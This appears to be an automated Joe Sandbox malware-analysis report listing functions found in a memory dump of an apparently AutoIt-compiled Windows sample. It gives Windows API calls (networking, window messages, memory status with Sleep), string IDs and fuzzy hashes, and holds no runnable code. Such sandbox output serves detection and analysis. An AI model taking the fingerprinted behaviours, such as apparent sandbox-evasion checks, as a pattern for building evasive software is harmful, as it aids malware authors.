                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: 54f9497f96c3c47d068433a730a5d6aff7f07716c62629e1ab555f45bba78b50
                                                                                        • Instruction ID: 2e9cca56e39aeda32231e977b2db2abdd236e93c80b94d3c2fda6eaaf7c842ce
                                                                                        • Opcode Fuzzy Hash: 54f9497f96c3c47d068433a730a5d6aff7f07716c62629e1ab555f45bba78b50
                                                                                        • Instruction Fuzzy Hash: 3461D176E00228AFCB14DF98D981EAEB7F4FF08310F11405AF506AB291D770AE41DB90
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00EFBCDA
                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00EFBCF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: b9c9e9e4b4f153bd30b8fd8d1cd98b0d73123c5117ae7efb102d5d596df61a84
                                                                                        • Instruction ID: 61bc33384cb84977b2c647a41e14b10e8a98d542842e5b42de5f49e7dc41abfa
                                                                                        • Opcode Fuzzy Hash: b9c9e9e4b4f153bd30b8fd8d1cd98b0d73123c5117ae7efb102d5d596df61a84
                                                                                        • Instruction Fuzzy Hash: 0D513471408748ABE321AF14DC86BAFBBE8FFD4354F41484EF2C8520A2DF7185A89756
                                                                                        APIs
                                                                                          • Part of subcall function 00EE44ED: __fread_nolock.LIBCMT ref: 00EE450B
                                                                                        • _wcscmp.LIBCMT ref: 00F2C65D
                                                                                        • _wcscmp.LIBCMT ref: 00F2C670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 7cf0138d291e9e91d6637b713e7c77af80d783d10bfe6391e7e6f47bfff170eb
                                                                                        • Instruction ID: d95655b1d0df2b19ad845bf966ec49b109f6995925165decc3cb750009074f24
                                                                                        • Opcode Fuzzy Hash: 7cf0138d291e9e91d6637b713e7c77af80d783d10bfe6391e7e6f47bfff170eb
                                                                                        • Instruction Fuzzy Hash: A341D572A0025ABADF20ABE49C41FEF7BF9AF49714F001069F615FB1C1D7749A049B91
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F4A85A
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F4A86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 979eef88003fd4aa83b5f053af9976232c0dc6458c39896d6284442548f0e39f
                                                                                        • Instruction ID: 0fe1861ed52d748e55de7cceddfbaf0c449e681fa57c5e8ad44a1964e33ac82a
                                                                                        • Opcode Fuzzy Hash: 979eef88003fd4aa83b5f053af9976232c0dc6458c39896d6284442548f0e39f
                                                                                        • Instruction Fuzzy Hash: 83410675E402099FDB14CF68C880BDA7BB9FB09310F14016AED05EB381D771A942DFA1
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F35190
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00F351C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: 7add810ab6ba32d516f7398d77524c48ea9abad60ad0904b8a9562f440b6eec1
                                                                                        • Instruction ID: e2b52c3823661f93b11aa7ae35c54d1e52722b1c3b3ec31a937357d0887cd8e0
                                                                                        • Opcode Fuzzy Hash: 7add810ab6ba32d516f7398d77524c48ea9abad60ad0904b8a9562f440b6eec1
                                                                                        • Instruction Fuzzy Hash: 00310971C00119ABCF01AFA5CC85AEE7FB9FF58750F100055E915B6166DB31AA46DBA0
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00F4980E
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F4984A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: 80662be1f271be92e4db1fec87716a522c55a8b0c8dd3e0ce71a884367d7a7b4
                                                                                        • Instruction ID: 00832a53cb592ba2fd00b7d8d0a6acd8a92f7966f9d589c979d9527b63af4f74
                                                                                        • Opcode Fuzzy Hash: 80662be1f271be92e4db1fec87716a522c55a8b0c8dd3e0ce71a884367d7a7b4
                                                                                        • Instruction Fuzzy Hash: 0E31A171610208AEEB109F38CC81BFB77A9FF59760F408619F9A9D7190CB71AC41E760
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F251C6
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F25201
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 9617bd0f34f7b8a29d555516631834238a55f9106e5b54444ff63d009f1cc0f8
                                                                                        • Instruction ID: 2eea301c67146a0637cdea8c568ffb751b6fb53a9f48a3effb5dc3b0c438e49f
                                                                                        • Opcode Fuzzy Hash: 9617bd0f34f7b8a29d555516631834238a55f9106e5b54444ff63d009f1cc0f8
                                                                                        • Instruction Fuzzy Hash: 5B31E631E00724EBEB28CF99E845BAEBBF4FF45760F140019E985E61E0D7749944EB10
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 2391506597-2584243854
                                                                                        • Opcode ID: 5c5ad2e9c092482c2e25682ff89aa3c2bcc445bafa960b8e2d40987abd4b7e68
                                                                                        • Instruction ID: bc59c8a566473895257ed1d9908d66875a234eea2b12eefd291beb84ced94b28
                                                                                        • Opcode Fuzzy Hash: 5c5ad2e9c092482c2e25682ff89aa3c2bcc445bafa960b8e2d40987abd4b7e68
                                                                                        • Instruction Fuzzy Hash: 00218D71A00218BBCF10EFA5CC82EAE73B4AF44354F1044A9F505FB181DB70EA45EBA2
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F4945C
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F49467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: f32228757d26d989c80fde14306d6410546075fe8c527afb494500a477870fdc
                                                                                        • Instruction ID: f7197e8e1be117a28335292782facb3a16f0d22513632b9efc073726929a7668
                                                                                        • Opcode Fuzzy Hash: f32228757d26d989c80fde14306d6410546075fe8c527afb494500a477870fdc
                                                                                        • Instruction Fuzzy Hash: 8111B2B1704208AFEF21DE54DC80EBB3B6EEB893B4F104125FD18972A0D6B59C52A760
                                                                                        APIs
                                                                                          • Part of subcall function 00EFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                          • Part of subcall function 00EFD17C: GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                          • Part of subcall function 00EFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F49968
                                                                                        • GetSysColor.USER32(00000012), ref: 00F49982
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: eb2050c2465f40fd4f6da7363d44be2571d7487b3b4a4fd4e792a306437dcdff
                                                                                        • Instruction ID: 13c2ff5650a6d764761ff6ae8ae0d1a4fdb27efd37c0214c1be98165dca456b9
                                                                                        • Opcode Fuzzy Hash: eb2050c2465f40fd4f6da7363d44be2571d7487b3b4a4fd4e792a306437dcdff
                                                                                        • Instruction Fuzzy Hash: 6C116D72A1020AAFDB04DFB8CC45AFA7BA8FB08314F010518FD55D3250D774E810EB50
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00F49699
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F496A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: 6594abf6aa6c64b2516b07692104480500a13f9483375d389d15c9492fcc381e
                                                                                        • Instruction ID: 5979f2f40d217acba859adf868d47bea1ec47cf0ce39907f70a8d3366bbc8caf
                                                                                        • Opcode Fuzzy Hash: 6594abf6aa6c64b2516b07692104480500a13f9483375d389d15c9492fcc381e
                                                                                        • Instruction Fuzzy Hash: A0118C71A04108ABEB205F64DC44EEB3B6AEB053B8F514318FD65971E0C7B5DC50BB60
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F252D5
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F252F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 0a8e98e14667ac2388d38aac2b5f91c2d987010b7958b264288fda37cc6a6ac5
                                                                                        • Instruction ID: 13751e023c81018d291637f76fd5656740557024dfb3de62781d09958d1c99dc
                                                                                        • Opcode Fuzzy Hash: 0a8e98e14667ac2388d38aac2b5f91c2d987010b7958b264288fda37cc6a6ac5
                                                                                        • Instruction Fuzzy Hash: 3C11B272D01634EBDB20DB98ED44B9D77B9AB06BA0F150025E941E72D0D7B0ED08E7A1
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F34DF5
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F34E1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 39af969aa27cc8e82ac96c81f457801e18e7695ec34ab75240c81a4905a7f556
                                                                                        • Instruction ID: d4f513b7289d796eb68178ac4b2ef5838cc7b4b4b3d07e59cfaab46c20e34e8a
                                                                                        • Opcode Fuzzy Hash: 39af969aa27cc8e82ac96c81f457801e18e7695ec34ab75240c81a4905a7f556
                                                                                        • Instruction Fuzzy Hash: 8D11A071A01225BBDB258F51C888FFBFBA8FF06775F10822AF51556180D3707980E6E0
                                                                                        APIs
                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00F3A84E
                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00F3A88B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: htonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 3832099526-2422070025
                                                                                        • Opcode ID: 2330f8d61f301c04d108888c62a1d7136dddfc1c7e63663a85cf2d9ef1e5af2d
                                                                                        • Instruction ID: 65e6c9853d1fd72c79f0f232cd83d9fcc72ed6a5a435cd4e511fbd6515adaa32
                                                                                        • Opcode Fuzzy Hash: 2330f8d61f301c04d108888c62a1d7136dddfc1c7e63663a85cf2d9ef1e5af2d
                                                                                        • Instruction Fuzzy Hash: B501F575600308ABCB209F69CC86FEDB364EF44734F10852AF566AB2D1D776E806E752
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F1B7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: d1c7f9cf0bba6e065b1f976b0627636bdea7a53599115fa18ca02e3ad283d01a
                                                                                        • Instruction ID: 8cfba207cad4914f13e1835afc8aefbb2512f149eac4a14bacf604ff9c058d21
                                                                                        • Opcode Fuzzy Hash: d1c7f9cf0bba6e065b1f976b0627636bdea7a53599115fa18ca02e3ad283d01a
                                                                                        • Instruction Fuzzy Hash: 8201F772A41118EBCB04EBA8CC52DFE33BEBF45360B14061DF472672D2EB755949A790
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F1B6EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: 5be8157a16109354f14f42223f0a826fd3a1109e18e56db7bb8727e859cff116
                                                                                        • Instruction ID: 833f61904ddfdda04d2455bbd6b2f04fc1df8aa877edb65d10a817c4b07c4195
                                                                                        • Opcode Fuzzy Hash: 5be8157a16109354f14f42223f0a826fd3a1109e18e56db7bb8727e859cff116
                                                                                        • Instruction Fuzzy Hash: B201A272A41008ABDB04EBA5C962BFE73B99F15344F24001DF402B3191DB949E19A7B6
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F1B76C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: f359a138be30a01ee80c45d1f234d711333e6aa6ef7a0360fad6a853968ccb77
                                                                                        • Instruction ID: e4c5c7bd5f98e6b00c1dfe3fc1d91eae26a0a13352569d47859d47397eb57d90
                                                                                        • Opcode Fuzzy Hash: f359a138be30a01ee80c45d1f234d711333e6aa6ef7a0360fad6a853968ccb77
                                                                                        • Instruction Fuzzy Hash: 8F01D672A41108FBDB00EBA4C912FFE73ED9B05344F240019F401B31D2DB649E4AA7B6
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00EE0000,00000063,00000001,00000010,00000010,00000000), ref: 00EE4048
                                                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,00F267E9,00000063,00000000,76950280,?,?,00EE3EE1,?,?,000000FF), ref: 00F541B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumImageLoadNamesResource
                                                                                        • String ID: >
                                                                                        • API String ID: 1578290342-260571596
                                                                                        • Opcode ID: 8a8ec80ccefe8b020e5e071e2044e6ea086f5db1df3bf2eba76595bfd2c91a49
                                                                                        • Instruction ID: 6ba6ea5877f7ee1107abe1e75e51c0dc32073eb1b6bcf6bceddd176b2a02120a
                                                                                        • Opcode Fuzzy Hash: 8a8ec80ccefe8b020e5e071e2044e6ea086f5db1df3bf2eba76595bfd2c91a49
